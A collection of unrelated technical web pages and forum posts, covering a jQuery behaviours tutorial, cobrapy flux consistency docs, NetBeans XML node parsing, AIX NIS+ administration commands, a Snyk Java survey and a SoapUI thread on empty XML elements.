We’ve all been there … Using jQuery each, it loops through the behaviour names, split into an array with split(" "). This is useful so that one single DOM element can have multiple behaviours: $.each(behaviors.split(" "), function(index,behaviorName){ ... } To run the desired method, inside of a try-catch statement, we clone a dynamically selected behaviour into a variable (BehaviorClass) and then make an instance of it (initializedBehavior), passing through the element that had the data-behavior attribute (this becomes container in the behaviour JS files): try { var BehaviorClass = DLN.Behaviors[behaviorName]; var initializedBehavior = new BehaviorClass(that);} You may have observed that I have no catch on that try-catch statement – probably a rather naughty thing to have done. But this does provide a way of not generating errors if the appropriate behaviour method doesn’t exist. This probably sounds more complex than following the code with your finger and simply working out what is going on. It is this stage where some familiarity with object-oriented JavaScript is useful. The Bearded Octo article ‘OO JS in 15 mins or Less’ is a fantastic resource for understanding writing object-orientated JavaScript. Ajax You may also note that there is a context parameter in the LoadBehavior function. This is to enable you to run LoadBehavior on elements you have ajaxed into place, and not simply only the elements present at DOM ready. You just need to pass through the element you want the to LoadBehavior function to search and it will set up behaviours on ajaxed content too. So for example: DLN.LoadBehavior($("#ajaxed")); Scope The behaviours themselves, and any other objects inside the namespaced object you make, are available globally. So you can call one behaviour from another, or set globally available variables. 
In this example, to run the slider function from a different behaviour you could call:

DLN.Behaviors.slider($("#newElementNeedsSlider"));

Methods and properties inside the behaviour JS files are not available globally, unless you choose. To make them so you could define them as properties or methods of a behaviour object, so inside of a behaviour file you could define:

DLN.Behaviors.slider.active = true;

This would then be available from any other JavaScript on your site. Or, you may want to use globally accessible getter and setter functions, which you would set up a similar way. So a behaviour JavaScript could be:

DLN.Behaviors.slider = function(container) {
  var slide_amount = 13;

  DLN.Behaviors.slider.setSlideAmount = function(amount) {
    slide_amount = amount;
  }

  DLN.Behaviors.slider.getSlideAmount = function() {
    return slide_amount;
  }

  // ...
}

Now you can globally update and retrieve a private variable to the method by:

DLN.Behaviors.slider.getSlideAmount();
// 13
DLN.Behaviors.slider.setSlideAmount(1312);
DLN.Behaviors.slider.getSlideAmount();
// 1312

Alternatively, to make a property or method globally available you could just add it to the top-level object:

DLN.version = "1.3.1.2";

or:

DLN.error = function(msg) {
  alert("error! "+msg);
};

Just be careful you don't make it too hard to follow what is defined where and end up making this simple method complex. If you are going to have a lot of site-wide variables and functions to store like this, consider making an object to put them in and a logically named folder of JavaScript files to contain them.

Production site

For development, lots of JS files with bits of code in are OK. But for production, concatenate and minify them into one file. Asset packers are a must, or you'll have individual requests slowing your application's load. Rails 3 has this built in, and similar asset packers are available for most application frameworks.
A quick Google returns a wealth of advice on compressing JS, such as Rails 3.1's Asset Pipeline, Minify and YUI Compressor for .NET. Thanks to Ross Bruniges for his peer review of this tutorial.
https://www.creativebloq.com/javascript/get-your-javascript-order-4135704
10. Consistency testing

For most problems, multiple flux states can achieve the same optimum, and thus we try to obtain a consistent network. By this, we mean that there will be multiple blocked reactions in the network, which gives rise to this inconsistency. To solve this problem, we use algorithms which can detect all the blocked reactions and also give us consistent networks.

Let us take a toy network, like so:

Here, \(v_{x}\), where \(x \in \{1, 2, \ldots, 6\}\), represents the flux carried by the reactions as shown above.

[1]: import cobra

[2]: test_model = cobra.Model("test_model")
     v1 = cobra.Reaction("v1")
     v2 = cobra.Reaction("v2")
     v3 = cobra.Reaction("v3")
     v4 = cobra.Reaction("v4")
     v5 = cobra.Reaction("v5")
     v6 = cobra.Reaction("v6")
     test_model.add_reactions([v1, v2, v3, v4, v5, v6])
     v1.reaction = "-> 2 A"
     v2.reaction = "A <-> B"
     v3.reaction = "A -> D"
     v4.reaction = "A -> C"
     v5.reaction = "C -> D"
     v6.reaction = "D ->"
     v1.bounds = (0.0, 3.0)
     v2.bounds = (-3.0, 3.0)
     v3.bounds = (0.0, 3.0)
     v4.bounds = (0.0, 3.0)
     v5.bounds = (0.0, 3.0)
     v6.bounds = (0.0, 3.0)
     test_model.objective = v6

unknown metabolite 'A' created
unknown metabolite 'B' created
unknown metabolite 'D' created
unknown metabolite 'C' created

10.1. Using FVA

The first approach we can follow is to use FVA (Flux Variability Analysis), which, among many other applications, is used to detect blocked reactions. The cobra.flux_analysis.find_blocked_reactions() function will return a list of all the blocked reactions obtained using FVA.

[3]: cobra.flux_analysis.find_blocked_reactions(test_model)

[3]: ['v2']

As we see above, we are able to obtain the blocked reaction, which in this case is \(v_2\).

10.2. Using FASTCC

The second approach to obtaining a consistent network in cobrapy is to use FASTCC. Using this method, you can expect to efficiently obtain an accurate consistent network. For more details regarding the algorithm, please see Vlassis N, Pacheco MP, Sauter T (2014).
[4]: consistent_model = cobra.flux_analysis.fastcc(test_model)
     consistent_model.reactions

[4]: [<Reaction v1 at 0x7fc71ddea5c0>,
      <Reaction v3 at 0x7fc71ddea630>,
      <Reaction v4 at 0x7fc71ddea668>,
      <Reaction v5 at 0x7fc71ddea6a0>,
      <Reaction v6 at 0x7fc71ddea6d8>]

Similar to the FVA approach, we are able to identify that \(v_2\) is indeed the blocked reaction.
https://cobrapy.readthedocs.io/en/latest/consistency.html
Using the ADO.NET Database Profile Setup To define a connection using the ADO.NET interface, you must create a database profile by supplying values for at least the basic connection parameters in the Database Profile Setup -- ADO.NET dialog box. You can then select this profile at any time to connect to your data in InfoMaker. For information on how to define a database profile, see Using database profiles. Specifying connection parameters You must supply a value for the Namespace and DataSource connection parameters and for the User ID and Password. When you use the System.Data.OleDb namespace, you must also select a data provider from the list of installed data providers in the Provider drop-down list. The Data Source value varies depending on the type of data source connection you are making. For example: DataDirect with OLE DB page and double-click the button next to the File Name box. (You can also launch the Data Link API in the Database painter by double-clicking.
https://docs.appeon.com/im2019/im_connecting_to_your_database/ch05s04.html
Expandable File Nodes Displaying Parsed File Content

The only thing that should have been, potentially, interesting about yesterday's screenshot of a config file editor was that explorer view that showed an expanded node representing a file, with subnodes matching the content of the file. So, here I'll show how to create that effect, in this case for project.xml files: I believe that knowing how to do this is going to be extremely useful for a lot of developers, especially those providing some kind of support for XML files, such as if you're creating web framework support, for example, or anything else involving XML files. Here are the steps, with all the code:

- Create a module project.
- Use the New File wizard, specifying the XML file's MIME type and namespace. When you finish the wizard, look in the MIME resolver. In my case, i.e., for project.xml files, I needed exactly this content in the MIME resolver, note especially the section in bold:

<?xml version="1.0" encoding="UTF-8"?>
<!--
To change this template, choose Tools | Templates
and open the template in the editor.
-->
<!DOCTYPE MIME-resolver PUBLIC "-//NetBeans//DTD MIME Resolver 1.0//EN" "">
<MIME-resolver>
    <file>
        <ext name="xml"/>
        <resolver mime="text/x-project+xml">
            <xml-rule>
                <element ns=""/>
            </xml-rule>
        </resolver>
    </file>
</MIME-resolver>

- Next, let's use the DataObject class to parse the file and expose the result. Add the following to the generated DataObject class:
//When we do so, we parse the project.xml file //and return org.w3c.dom.Node names to the DataNode: synchronized Map<String, List<String>> getEntries() { if (entries == null) { parse(); } return entries; } private void parse() { try { entries = new LinkedHashMap<String, List<String>>(); List sectionEntries = null; BufferedReader br = null; //Use the FileObject retrieved from the DataObject, //via DataObject.getPrimaryFile(), to get the input stream: br = new BufferedReader(new InputStreamReader(getPrimaryFile().getInputStream())); InputSource source = new InputSource(br); //You could use any kind of parser, depending on your file type, //though for XML files you can use the NetBeans IDE org.openide.xml.XMLUtil class //to convert your input source to an org.w3c.dom.Document object: org.w3c.dom.Document doc = XMLUtil.parse(source, false, false, null, null); org.w3c.dom.NodeList list = doc.getElementsByTagName("*"); int length = list.getLength(); for (int i = 0; i < length; i++) { org.w3c.dom.Node mainNode = list.item(i); String value = mainNode.getNodeName(); //For purposes of this example, we simply put //the name of the node in our linked hashmap: entries.put(value, sectionEntries); } } catch (IOException ex) { Exceptions.printStackTrace(ex); } catch (SAXException ex) { Exceptions.printStackTrace(ex); } } - Next, in the generated DataNode, let's create a controller for triggering the parsing and for creating a child node per node name: static class SectionChildren extends Children.Keys { private ProjectDataObject obj; private Lookup lookup; private SectionChildren(ProjectDataObject obj, Lookup lookup) { this.obj = obj; this.lookup = lookup; } //Called the first time that a list of nodes is needed. //An example of this is when the node is expanded. @Override protected void addNotify() { setKeys(obj.getEntries().keySet()); } //Called when the user collapses a node and starts working on //something else.
The NetBeans Platform will notice that the list //of nodes is no longer needed, and it will free up the memory that //is no longer being used. @Override protected void removeNotify() { setKeys(Collections.emptyList()); } //Called whenever a child node needs to be constructed. @Override protected Node[] createNodes(String key) { return new Node[]{new SectionNode(key, obj.getEntries().get(key), lookup)}; } } static class SectionNode extends AbstractNode { SectionNode(String name, java.util.List entries, Lookup lookup) { super(Children.LEAF); setName(name); setIconBaseWithExtension(ENTRY_IMAGE_ICON_BASE); } } For further info on the above code, see NetBeans System Properties Module Tutorial. - Finally, you might be wondering how to trigger the above code. In other words, when/how should you determine that new child nodes should be created? Answer: rewrite the DataNode constructors: public ProjectDataNode(ProjectDataObject obj) { super(obj, new SectionChildren(obj, null)); setIconBaseWithExtension(SECTION_IMAGE_ICON_BASE); } ProjectDataNode(ProjectDataObject obj, Lookup lookup) { super(obj, new SectionChildren(obj, lookup), lookup); setIconBaseWithExtension(SECTION_IMAGE_ICON_BASE); } The bits in bold above are what I added to trigger the creation of the child nodes. And that's all. Now you can install your module and expand the node of the file type that you're interested in. Using the parse method above, you can parse the content in any way you like, so that when the DataNode creates new section nodes, the data that you've parsed will be used to set the display name (or something else) on the child nodes. Here, for example, I've parsed the project.xml file in such a way that all the module dependencies appear as the display names of the child nodes: You can also add child nodes below the existing child nodes, and so on. Apr 13 2008, 04:59:31 AM PDT thanks Posted by bloggersmosaic on April 13, 2008 at 07:51 PM PDT
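The parse() method above leans on the NetBeans org.openide.xml.XMLUtil helper. If you want to experiment with the name-collecting logic outside the NetBeans Platform, the same loop can be sketched with the JDK's own DOM parser (a standalone illustration; the class name and sample XML are made up, not from the tutorial):

```java
import java.io.ByteArrayInputStream;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

public class ElementNameCollector {

    // Collect every element name in document order, mirroring the
    // getElementsByTagName("*") loop in the DataObject's parse() method.
    public static Map<String, List<String>> collectNames(String xml) throws Exception {
        Map<String, List<String>> entries = new LinkedHashMap<>();
        DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        Document doc = db.parse(new ByteArrayInputStream(xml.getBytes("UTF-8")));
        NodeList list = doc.getElementsByTagName("*");
        for (int i = 0; i < list.getLength(); i++) {
            // As in the tutorial, only the node name matters here;
            // the value is a placeholder for per-section entries.
            entries.put(list.item(i).getNodeName(), null);
        }
        return entries;
    }

    public static void main(String[] args) throws Exception {
        String xml = "<project><name>demo</name><deps><dep/></deps></project>";
        // prints [project, name, deps, dep]
        System.out.println(collectNames(xml).keySet());
    }
}
```

In the real module, the keys of this map are exactly what addNotify() passes to setKeys(), so each collected element name becomes one child node.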
http://blogs.sun.com/geertjan/entry/expandable_file_nodes_with_parsed
This section describes how to use the NIS+ directory administration commands to perform specific directory-related tasks. Use the niscat -o command to list the object properties of an NIS+ directory. To use it, you must have read access to the directory object itself. To list the object properties of a directory, use niscat with the -o option, as follows: niscat -o directory-name Use the nisls command to list the contents of an NIS+ directory. To use it, you must have read rights to the directory object. To display in terse format, use: nisls [-dgLmMR] directory-name To display in verbose format, use: nisls -l [-gm] [-dLMR] directory-name To list the contents of a directory in the default short format, use one or more of the options listed below and a directory name. If you do not supply a directory name, NIS+ uses the default directory. nisls [-dLMR] nisls [-dLMR] directory-name In the following example, nisls is entered from the root master server of the root domain wiz.com.: rootmaster% nisls wiz.com.: org_dir groups_dir The following is another example entered from the root master server: rootmaster% nisls -R Sales.wiz.com. Sales.wiz.com.: org_dir groups_dir groups_dir.Sales.wiz.com.: admin org_dir.Sales.wiz.com.: auto_master auto_home bootparams cred . . . To list the contents of a directory in the verbose format, use the -l option and one or more of the options listed below. The -g and -m options modify the attributes that are displayed. If you do not supply a directory name, NIS+ uses the default directory. nisls -l [-gm] [-dLMR] nisls -l [-gm] [-dLMR] directory-name The following is an example, entered from the master server of the root domain wiz.com.: rootmaster% nisls -l wiz.com.: D r---rmcdr---r--- rootmaster.wiz.com. date org_dir D r---rmcdr---r--- rootmaster.wiz.com. date groups_dir The nismkdir command creates a nonroot NIS+ directory and associates it with a master server. (To create a root directory, use the nisinit -r command. 
The nismkdir command can also be used to add a replica to an existing directory.) This section describes how to add a nonroot directory and its master server to an existing system using the nismkdir command. However, adding nonroot directories is easier to do using Web-based System Manager, SMIT, or the nisserver script, described in Using NIS+ Setup Scripts. To create a directory, use: nismkdir [-m master-server] directory-name To add a replica to an existing directory, use: nismkdir -s replica-server directory-name nismkdir -s replica-server org_dir. directory-name nismkdir -s replica-server groups_dir. directory-name To create a directory, you must have create rights to its parent directory on the domain master server. First use the -m option to identify the master server and then the -s option to identify the replica, as follows: nismkdir -m master directory nismkdir -s replica directory Attention: Always run nismkdir on the master server. Never run nismkdir on the replica machine. Running nismkdir on a replica creates communications problems between the master and the replica. The following example creates the Sales.wiz.com. directory and specifies its master server, smaster.wiz.com. and its replica, rep1.wiz.com. It is entered from the root master server. rootmaster% nismkdir -m smaster.wiz.com. Sales.wiz.com. rootmaster% nismkdir -m smaster.wiz.com. org_dir.Sales.wiz.com. rootmaster% nismkdir -m smaster.wiz.com. groups_dir.Sales.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. Sales.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. org_dir.Sales.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. groups_dir.Sales.wiz.com. The nismkdir command allows you to use the parent directory's servers for the new directory instead of specifying its own. However, this should not be done except in the case of small networks. See the following examples: rootmaster% nismkdir Sales.wiz.com rootmaster% nismkdir -m smaster.wiz.com. Sales.wiz.com. 
Because no replica server is specified, the new directory has only a master server until you use nismkdir again to assign a replica. If the Sales.wiz.com. domain already exists, the nismkdir command as shown above makes salesmaster.wiz.com. its new master server and assigns its old master server as a replica. This section describes how to add a replica server to an existing system using the nismkdir command. However, adding replicas is easier to do using Web-based System Manager, SMIT, or the nisserver script described in Using NIS+ Setup Scripts. To assign a new replica server to an existing directory, use nismkdir on the master server with the -s option and the name of the existing directory, org_dir, and groups_dir: nismkdir -s replica-server existing-directory-name nismkdir -s replica-server org_dir. existing-directory-name nismkdir -s replica-server groups_dir. existing-directory-name Because the directory already exists, the nismkdir command does not re-create it. It only assigns it the additional replica. In the following example, rep1 is the name of the new replica machine: rootmaster% nismkdir -s rep1.wiz.com. wiz.com. rootmaster% nismkdir -s rep1.wiz.com. org_dir.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. groups_dir.wiz.com. Note that you cannot assign a server to support its parent domain, unless it belongs to the root domain. Attention: You must run nisping from the master server on the three directories: rootmaster# nisping wiz.com. rootmaster# nisping org_dir.wiz.com. rootmaster# nisping groups_dir.wiz.com. You should see results similar to the following: rootmaster# nisping wiz.com. Pinging replicas serving directory wiz.com. : Master server is rootmaster.wiz.com. Last update occurred at Wed Nov 18 19:54:38 1995 Replica server is rep1.wiz.com. Last update seen was Wed Nov 18 11:24:32 1995 Pinging ... rep1.wiz.com.
It is good practice to include nisping commands for each of these three directories in the master server's /etc/crontab file so that each directory is pinged at least once every 24 hours after being updated. The nisrmdir command can remove a directory or simply dissociate a replica server from a directory. To remove an entire directory and dissociate its master and replica servers, use the nisrmdir command without any options: nisrmdir directory-name The following example removes the manf.wiz.com. directory from beneath the wiz.com. directory: rootmaster% nisrmdir manf.wiz.com. To dissociate a replica server from a directory, use the nisrmdir command with the -s option: nisrmdir -s servername directory The following example dissociates the manfreplica1 server from the manf.wiz.com. directory: rootmaster% nisrmdir -s manfreplica1 manf.wiz.com. The nisrm command is similar to the standard rm system command. It removes any NIS+ object from the namespace, except directories and nonempty tables. To use the nisrm command, you must have destroy rights to the object. If you do not have destroy rights, the operation will fail. To remove a nondirectory object, use: nisrm [-if] object-name To remove nondirectory objects, use the nisrm command and provide the object names, as follows: nisrm object-name... The following example removes a group and a table from the namespace: rootmaster% nisrm -i admins.wiz.com. groups.org_dir.wiz.com. Remove admins.wiz.com.? y Remove groups.org_dir.wiz.com.? y The rpc.nisd command starts the NIS+ daemon. The daemon can run in NIS-compatibility mode, which enables it to answer requests from NIS clients as well. You do not need any access rights to start the NIS+ daemon, but you should be aware of all its prerequisites and related tasks. By default, the NIS+ daemon starts with security level 2.
To start the daemon, use: startsrc -s rpc.nisd To start the daemon in NIS-compatibility mode, use: startsrc -s rpc.nisd -a "-Y" To start an NIS-compatible daemon with DNS forwarding capabilities, use: startsrc -s rpc.nisd -a "-Y -B" To start the NIS+ daemon on any server, use the command without options: startsrc -s rpc.nisd The daemon starts with security level 2, which is the default. To start the daemon with security level 0, use the -S flag: startsrc -s rpc.nisd -a "-S 0" You can start the NIS+ daemon in NIS-compatibility mode in any server, including the root master. Use the -Y (uppercase) option: startsrc -s rpc.nisd -a "-Y" If the server is rebooted, the daemon will not restart in NIS-compatibility mode unless you also edit the server's /etc/rpc.nfs file with mk_nisd -I -y -b. You can add DNS forwarding capabilities to an NIS+ daemon running in NIS-compatibility mode by adding the -B option to rpc.nisd: startsrc -s rpc.nisd -a "-Y -B" If the server is rebooted, the daemon will not restart in DNS-forwarding NIS-compatibility mode unless you also edit the server's /etc/rpc.nfs file with mk_nisd -I -y -b. To stop the NIS+ daemon, whether it is running in normal or NIS-compatibility mode, use: stopsrc -s rpc.nisd This section describes how to initialize a workstation client using the nisinit command. An easier way to do this is with the nisclient script, described in Using NIS+ Setup Scripts. The nisinit command initializes a workstation to be an NIS+ client. As with the rpc.nisd command, you do not need any access rights to use the nisinit command, but you should be aware of its prerequisites and related tasks. To initialize a client, use: nisinit -c -B nisinit -c -H hostname nisinit -c -C filename To initialize a root master server, use: nisinit -r You can initialize a client in three different ways: Each way has different prerequisites and associated tasks. 
For instance, before you can initialize a client by host name, the client's /etc/hosts file must list the host name you will use and the irs.conf file must have files as the first choice on the hosts line. Following is a summary of the steps that use the nisinit command. To initialize a client by host name, use the -c and -H options, and include the name of the server from which the client will obtain its cold-start file: nisinit -c -H hostname To initialize a client by cold-start file, use the -c and -C options, and provide the name of the cold-start file: nisinit -c -C filename To initialize a client by broadcast, use the -c and -B options: nisinit -c -B To initialize the root master server, use the nisinit -r command: nisinit -r To start the NIS+ cache manager (for example, at system startup), use: startsrc -s nis_cachemgr To start it with a cleared cache, use: startsrc -s nis_cachemgr -a "-i" To stop it, use stopsrc -s nis_cachemgr. The nisshowcache command displays the contents of a client's directory cache. The nisshowcache command is located in /usr/lib/nis. It displays only the cache header and the directory names. The following is an example entered from the root master server: rootmaster# /usr/lib/nis/nisshowcache -v Cold Start directory: Name : wiz.com. Type : NIS Master Server : Name : rootmaster.wiz.com. Public Key : Diffie-Hellman (192 bits) Universal addresses (3) . . . Replica: Name : rootreplica1.wiz.com. Public Key : Diffie-Hellman (192 bits) Universal addresses (3) . . . Time to live : 12:0:0 Default Access Rights : The nisping command pings servers and can automatically update local tables or a specified directory. (The replicas normally wait a couple of minutes before executing the update tasks.) Before pinging, the command checks the time of the last update received by each replica. When the time for a particular replica is the same as the last update sent by the master, nisping does not ping that replica.
To display the time of the last update, type: /usr/lib/nis/nisping -u [domain] To ping replicas, type: /usr/lib/nis/nisping [domain] To ping the master server (to check whether it is available for updates), type: /usr/lib/nis/nisping -H hostname [domain] Checkpointing is the process in which each server, including the master, updates its information on disk from the domain's transaction log. You can also checkpoint a directory to update the data in that directory and its subdirectories. To checkpoint servers, use: /usr/lib/nis/nisping -C hostname [domain] To checkpoint a directory, use: /usr/lib/nis/nisping -C directoryname For more information, read the nisping command description. The nislog command displays the contents of the transaction log. For more information, see the nislog command description. To display the contents of a transaction log, use the nislog command, as follows: /usr/sbin/nislog To display the contents beginning with the first entries (header), use the -h option, as follows: /usr/sbin/nislog -h [number] To display the contents beginning with the most recent entries (trailer), use the -t option, as follows: /usr/sbin/nislog -t [number] where number is an optional argument that defines the starting line number. The nischttl command changes the time-to-live (TTL) value of NIS+ objects and entries. The TTL values you assign to objects or entries should depend on the stability of the object. If an object is prone to frequent change, assign it a low TTL value. If it is steady, assign it a high one. A high TTL is a week; a low one is less than a minute. Password entries should have TTL values of about 12 hours to accommodate one password change per day. Entries in tables that do not change much, such as those in the RPC table, can have values of several weeks. To change the time-to-live of an object, you must have modify rights to that object. To change the TTL of a table entry, you must have modify rights to the table, entry, or columns you wish to modify.
To change the time-to-live value of objects, use: nischttl time-to-live object-name nischttl [-L] time-to-live object-name To change the time-to-live value of entries, use: nischttl time-to-live [column=value,...], table-name nischttl [-ALP] time-to-live [column=value,...],table-name Where time-to-live is expressed in days (d), hours (h), minutes (m), and seconds (s). These values can be used in combination. For example, a TTL value of 4d3h2m1s specifies a time to live of four days, three hours, two minutes, and one second. To display the current TTL value of an object or table entry, use the nisdefaults -t command.
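As a cross-check of the time-to-live syntax, a combined form such as 4d3h2m1s is just a sum of unit multiples. A small illustrative helper (not part of NIS+) that converts such a string to seconds:

```java
public class TtlParser {

    // Convert an nischttl-style time-to-live string such as "4d3h2m1s"
    // into a total number of seconds. Each unit is optional, but the
    // units that do appear are expected in d, h, m, s order.
    public static long toSeconds(String ttl) {
        long total = 0;
        long value = 0;
        for (char c : ttl.toCharArray()) {
            if (Character.isDigit(c)) {
                value = value * 10 + (c - '0');
            } else {
                switch (c) {
                    case 'd': total += value * 86400; break;
                    case 'h': total += value * 3600;  break;
                    case 'm': total += value * 60;    break;
                    case 's': total += value;         break;
                    default: throw new IllegalArgumentException("bad unit: " + c);
                }
                value = 0;
            }
        }
        return total;
    }

    public static void main(String[] args) {
        // 4 days + 3 hours + 2 minutes + 1 second = 356521 seconds
        System.out.println(toSeconds("4d3h2m1s"));
    }
}
```

So the document's example of "four days, three hours, two minutes, and one second" works out to 356521 seconds, and a 12-hour password-entry TTL to 43200.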
http://ps-2.kev009.com/wisclibrary/aix51/usr/share/man/info/en_US/a_doc_lib/aixbman/nisplus/adm_dirs.htm
using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace BookList { class Book { public string Author { get; set; } public string Title { get; set; } public decimal Price { get; set; } public Book(string author, string title, string price) { this.Author = author; this.Title = title; this.Price = Convert.ToDecimal(price); } public override string ToString() { return Author + " " + Title + " €" + Price; } public string FileWriteFormat() { //charles dickens,hard times,10 return Author + "," + Title + "," + Price; } } } Hi John, Welcome to MSDN forum. Could you please tell us what the meaning of "tips from jk" is? What do you want our support team to do with this code? This forum is mainly to discuss and ask questions about the Visual C++ IDE, libraries, samples, tools, setup, and Windows programming using MFC and ATL. Was the above code related to Visual C++? If so, what was the specific kind of this project? Please provide more details so that we could have a better understanding of this issue. Best Regards, J?
https://social.msdn.microsoft.com/Forums/en-US/2a2a26a4-c422-4ceb-bd98-a3d7ba99abf7/tips-from-jk?forum=vcgeneral
Spring dominates the Java ecosystem with 60% using it for their main applications Do you use the Spring Framework? Exactly 6 out of 10 people depend on the Spring Framework for the production of their application. That is a remarkably high market share for a third-party open source framework. Keep all your Spring dependencies and other direct and transitive dependencies up to date and free of known vulnerabilities by scanning your applications and libraries quickly and for free with Snyk. What Spring version do you use for your main application? Spring has been around for a long time. By introducing significant changes and innovations, Spring has evolved into the most dominant framework in the Java ecosystem. With two thirds of Spring users working with Spring 5, there's a strong adoption rate of newer versions. Which server-side web frameworks do you use? The server-side is still a Spring-dominated world, with half of the market using Spring Boot and almost a third using Spring MVC. Frameworks like Micronaut and Quarkus probably have what it takes to compete against Spring. Nonetheless, let's wait until next year's report before we draw any conclusions. JHipster does not look as popular as one would expect from all the conference talks. It's also interesting to see that JSF is still alive. Do you use Enterprise Java? (J2EE, Java EE, Jakarta EE) The question of whether Java developers use the Enterprise Edition (EE) of Java is something we ask every year. Only this year, we slightly changed the question. We added the option "Yes, via Spring or another framework (e.g. JPA or Servlets)" to ensure that people who use EE indirectly do not choose the "No" option. What Java EE version do you use for your main application? Almost 4 out of 10 people use the latest version of Java EE while Java EE 7 still remains quite popular.
What’s more, 2% of developers reported that they still use J2EE and, even though this seems like a very small percentage, it is a significant number as it is almost equal to the number of people that use Scala as their main application language! It’s also important to mention that 21% of the respondents do not know the exact version of Java EE they’re using. By cross-referencing the answers to this question with the previous question, we found out that 95% of developers who are not aware of their exact Java EE version, use Java EE indirectly, namely through the Spring Framework. What was your reaction to Oracle and the Eclipse foundation not agreeing on continued usage of the javax namespace? After many months of negotiations, Oracle and the Eclipse foundation weren’t able to come to an agreement over the usage of the javax package namespace by the Eclipse Foundation Community. The javax namespace falls under trademark by Oracle which means that, moving forward, all improvements made to Jakarta EE by the Eclipse Foundation, have to use a different package name. As a result, changes to Jakarta EE are also accompanied with migration of library code. Although the change in package name clearly marks the ownership of that package — Oracle up to Java EE 8 and the Eclipse Foundation from Jakarta EE 8 onwards — it affects every API in the Enterprise Edition as they all begin with javax. When asked about this development, the vast majority of participants feel annoyed by Oracle’s position on the matter with 2 out of 3 JVM developers stating their disappointment of the negotiated outcomes. In fact, the responses to this question raise some concerns for Oracle. What if this outcome ultimately harms Oracle’s stewardship of Java? Would you consider switching to another framework/technology in order to avoid migrating to a newer Jakarta EE version, due to the javax namespace changes? 
Despite the majority of the respondents being rather disappointed with the javax namespace changes, only 1 out of 10 developers would switch to another framework. According to our survey, 66% of developers are probably or definitely staying with Jakarta EE despite the namespace changes. It is possible that developers believe that these changes will not affect them, since the majority of them use the EE version indirectly, via frameworks like Spring. This points to the namespace change being more of a disappointing annoyance rather than anything developers really take action over. What other languages does your application use? Not many people use a single language for their application anymore. It's safe to say that the vast majority of developers nowadays need to be polyglot, fullstack or multi-lingual. As languages in many cases serve a specific goal it is obvious that developers use other languages alongside their main JVM language. This doesn't mean you have to like the language. Some languages are considered a necessary evil fit-for-purpose. It is important to mention that multiple answers were allowed when answering this question. The results, however, are not that surprising. JavaScript is the most popular language for front end development with 62%, SQL with 44% is the most popular for querying databases, while the most popular choice for data science and machine learning applications is Python with 22%. Which client-side web frameworks do you use? Participants were able to select multiple options for this question — why choose one framework when you can use them all, right? Looking at the responses, Angular looks like the clear winner with 38%. However, with so many Angular versions available, we are not certain whether newer or older versions of Angular are the winners here. React is the runner-up with 31%, closely followed by jQuery with 28%. It's also interesting to point out that, according to our survey, 2 out of 10 developers don't use any frameworks.
Let’s see if this list changes significantly over time. !
https://snyk.io/blog/spring-dominates-the-java-ecosystem-with-60-using-it-for-their-main-applications/
Empty Elements in XML with Data from Excel Hello community I would like to fill my rigid XML schema with data from an Excel file. Now there are test cases, where I don't need any data from the excel (Data Driven Testing | SoapUI). How can I send the schema correctly although the field is "empty"? Do I need to set some settings right? For instance: <v13:FamilyName> <v13:PrimaryValue>XXAD</v13:PrimaryValue> <!--0 to 5 repetitions:--> <v13:AlternativeSpelling> <v13:Value></v13:Value> <v13:Source> <v13:Code></v13:Code> That just proves you should make sure you read everyone's posts before responding to the last. I also suggested Groovy using an event handler. Unfortunately I didn't notice everyone else suggested this too! Cheers Rich @DavidSEM_Admin Sorry, I'm not back in work for another week, so I cannot dig out some examples. At work, I have pro, but at home, I don't so I don't currently have access to the pro features to help. Groovy Script steps allow you to script some action or task. They return a value. It could be true, false, 1, 0, 'hello world' or even a whole payload. You could have one or several such steps in your test prior to the REST/SOAP request step. In the REST/SOAP step you can 'pull' in the results of the Groovy step(s). It's a really, really neat feature and one I use a lot. Great big caveat here, this is an untested example. There will be bugs... In terms of reading your datasource values in a Groovy Step, here is an example... // What the below does is read your DataSource and gets the value of CountryCode // for the current row and assigns it into a variable called countryCode. def countryCode = context.expand( '${DataSource#CountryCode}' ); // Initialise a var to use to return whatever we need from this script. def returnValue = ''; // Check if countryCode contains something.... if(countryCode.length() > 0){ // It does! Let's put country code inside a tag.
returnValue = "<someElement>" + countryCode + "</someElement>"; } else { // Do nothing, there is no country code to consider for this row. // But, you could do something. E.g. shove in a default value. } // Let's return our custom part of the request. return returnValue; Then, in your REST/SOAP Request, you can pull this into the body of the request. E.g. <soapEnv:envelope> <soapEnv:header/> <soapEnv:body> <someElementInDataSource>${DataSource#CountryCode}</someElementInDataSource> ${GroovyStepName#result} </soapEnv:body> </soapEnv:envelope> In the above, it tries to show how you pull in the result of your Groovy into your request. The syntax might be wrong, but what you can do is in the request window, right-click and select 'Get Data' from the context menu, that gives you access to the other steps in your test. Just select the Groovy Step and then 'result' from the pop-out menus and SoapUI will insert the command for you. I saw the solution with a Groovy script and I tried it and it somehow did not work. If it helps I can provide the XML and the Excel file with the data and the script I found on the web. Maybe it is a simple mistake from my side. However, I am not very familiar with scripts and the Groovy language (or any programming language). I also use SoapUI Pro with ReadyAPI 3.3.1 This would be the XML Request: > ------------------------------------ This would be the ExcelSheet where the Data is taken: ------------------------------------ This is the Groovy script I found: def groovyUtils = new com.eviware.soapui.support.GroovyUtils( context ) def stepName = context.getCurrentStep().getLabel() def holder = groovyUtils.getXmlHolder( stepName + "#Request") // Find nodes that only consist of whitespaces. for( item in holder.getDomNodes( "//*[normalize-space(.) = '' and count(*) = 0]" )){ item.parent().removeXobj() } // Update the request and write the updated request back to the test step.
